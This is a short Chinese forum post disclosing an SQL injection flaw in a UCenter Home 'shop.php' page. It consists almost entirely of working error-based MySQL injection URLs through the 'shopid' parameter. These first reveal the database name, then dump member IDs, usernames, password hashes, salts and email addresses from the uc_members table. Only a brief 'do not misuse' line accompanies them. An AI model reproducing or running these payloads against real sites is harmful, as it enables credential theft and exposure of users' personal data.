会飞的鱼
原文链接 COG论坛
http://forum.chowngroup.com/forum.php?mod=viewthread&tid=137
漏洞文件 : Shop.php
漏洞表现: ?ac=view&shopid=
漏洞类型 : SQL Injection (MySQL Error Based)
利用POC:
1、查询出UC_HOME的DATABSE:
- http://xxoo.com/shop.php?ac=view&shopid=1 and (select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
2、根据1查询出的DATABSE(替换XXOO_UC_DB),进一步注入出member信息。
- http://xxoo.com/shop.php?ac=view&shopid=1 and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.salt,0x3a,uc_members.email) as char),0x27,0x7e) from `XXOO_UC_DB`.uc_members LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- http://xxoo.com/shop.php?ac=view&shopid=50534 and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email) as char),0x27,0x7e) from ucenter.uc_members LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
请勿乱用!!!
